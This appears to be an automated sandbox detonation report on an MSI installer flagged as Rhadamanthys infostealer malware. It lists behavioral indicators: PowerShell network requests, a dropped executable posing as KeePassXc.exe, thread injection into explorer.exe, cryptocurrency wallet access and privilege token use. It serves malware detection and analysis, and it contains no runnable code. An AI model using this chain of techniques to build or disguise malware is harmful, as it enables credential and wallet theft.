Analysis Overview
SHA256
67ecba82950d8dfefe1b7c8564f959cdb35601dbc9a4b010bd929be7d1ae240c
Threat Level: Known bad
The file setup.msi was found to be: Known bad.
Malicious Activity Summary
Rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Accesses cryptocurrency files/wallets, possible credential harvesting
Enumerates connected drives
Suspicious use of SetThreadContext
Command and Scripting Interpreter: AutoIT
Loads dropped DLL
Executes dropped EXE
Drops file in Windows directory
Program crash
Suspicious behavior: EnumeratesProcesses
Modifies Internet Explorer settings
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: GetForegroundWindowSpam
Modifies registry class
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Suspicious behavior: AddClipboardFormatListener
Checks processor information in registry
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-01 21:53
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-01 21:53
Reported
2024-06-01 22:12
Platform
win10v2004-20240426-en
Max time kernel
272s
Max time network
278s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Downloads MZ/PE file
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
Command and Scripting Interpreter: AutoIT
| Description | Indicator | Process | Target |
| N/A | N/A | \??\c:\st\Autoit3.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3492 set thread context of 1988 | N/A | C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe | C:\Windows\SysWOW64\explorer.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Installer\e5737c9.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI3856.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI3952.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e5737c9.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI4D99.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{BFB3A06C-96C7-42C4-A90F-78C892A36FF8} | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e5737cd.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI38F3.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI3972.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI39B1.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI3A2F.tmp | C:\Windows\system32\msiexec.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\HJJEGIEHIJ.exe | N/A |
| N/A | N/A | \??\c:\st\Autoit3.exe | N/A |
Loads dropped DLL
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | \??\c:\st\Autoit3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | \??\c:\st\Autoit3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\explorer.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" | C:\Windows\explorer.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\timedate.cpl,-52#immutable1 = "Set the date, time, and time zone for your computer." | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\system32\Vault.dll,-1#immutable1 = "Credential Manager" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\Speech\SpeechUX\speechuxcpl.dll,-1#immutable1 = "Speech Recognition" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\Speech\SpeechUX\speechuxcpl.dll,-2#immutable1 = "Configure how speech recognition works on your computer." | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\netcenter.dll,-1#immutable1 = "Network and Sharing Center" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\intl.cpl,-2#immutable1 = "Customize settings for the display of languages, numbers, times, and dates." | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\srchadmin.dll,-601#immutable1 = "Indexing Options" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\NodeSlot = "2" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{D674391B-52D9-4E07-834E-67C98610F39D}\GroupByKey:PID = "0" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\fvecpl.dll,-2#immutable1 = "Protect your PC using BitLocker Drive Encryption." | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\main.cpl,-102#immutable1 = "Keyboard" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\system32\DeviceCenter.dll,-1000#immutable1 = "Devices and Printers" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\powercpl.dll,-1#immutable1 = "Power Options" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\telephon.cpl,-1#immutable1 = "Phone and Modem" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\timedate.cpl,-51#immutable1 = "Date and Time" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\Microsoft.Windows.ControlPanel\ShowCmd = "1" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 1e007180000000000000000000006abe817b2bce7646a29eeb907a5126c50000 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\recovery.dll,-2#immutable1 = "Recovery" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\accessibilitycpl.dll,-10#immutable1 = "Ease of Access Center" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{DE4F0660-FA10-4B8F-A494-068B20B22307}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\intl.cpl,-3#immutable1 = "Region" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\system32\colorcpl.exe,-7#immutable1 = "Change advanced color management settings for displays, scanners, and printers." | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{DE4F0660-FA10-4B8F-A494-068B20B22307} | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{D674391B-52D9-4E07-834E-67C98610F39D}\Mode = "4" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{DE4F0660-FA10-4B8F-A494-068B20B22307}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\Microsoft.Windows.ControlPanel | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\FirewallControlPanel.dll,-12123#immutable1 = "Set firewall security options to help protect your computer from hackers and malicious software." | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\srchadmin.dll,-602#immutable1 = "Change how Windows indexes to search faster" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\fvecpl.dll,-1#immutable1 = "BitLocker Drive Encryption" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f706806ee260aa0d7449371beb064c986830000 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{D674391B-52D9-4E07-834E-67C98610F39D}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\DiagCpl.dll,-15#immutable1 = "Troubleshoot and fix common computer problems." | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\mmsys.cpl,-300#immutable1 = "Sound" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\Microsoft.Windows.ControlPanel\HotKey = "0" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\fhcpl.dll,-52#immutable1 = "File History" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\recovery.dll,-101#immutable1 = "Recovery" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\mmsys.cpl,-301#immutable1 = "Configure your audio devices or change the sound scheme for your computer." | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{DE4F0660-FA10-4B8F-A494-068B20B22307}\LogicalViewMode = "2" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\powercpl.dll,-2#immutable1 = "Conserve energy or maximize performance by choosing how your computer manages power." | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\usercpl.dll,-1#immutable1 = "User Accounts" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\autoplay.dll,-1#immutable1 = "AutoPlay" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\system32\colorcpl.exe,-6#immutable1 = "Color Management" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\accessibilitycpl.dll,-45#immutable1 = "Make your computer easier to use." | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\RADCUI.dll,-15300#immutable1 = "RemoteApp and Desktop Connections" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{DE4F0660-FA10-4B8F-A494-068B20B22307}\FFlags = "18874385" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{DE4F0660-FA10-4B8F-A494-068B20B22307}\IconSize = "48" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{D674391B-52D9-4E07-834E-67C98610F39D}\LogicalViewMode = "1" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\systemcpl.dll,-1#immutable1 = "System" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{D674391B-52D9-4E07-834E-67C98610F39D}\IconSize = "16" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\usercpl.dll,-2#immutable1 = "Change user account settings and passwords for people who share this computer." | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\devmgr.dll,-5#immutable1 = "View and update your device hardware settings and driver software." | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\sdcpl.dll,-101#immutable1 = "Backup and Restore (Windows 7)" | C:\Windows\explorer.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | \??\c:\st\Autoit3.exe | N/A |
| N/A | N/A | \??\c:\st\Autoit3.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
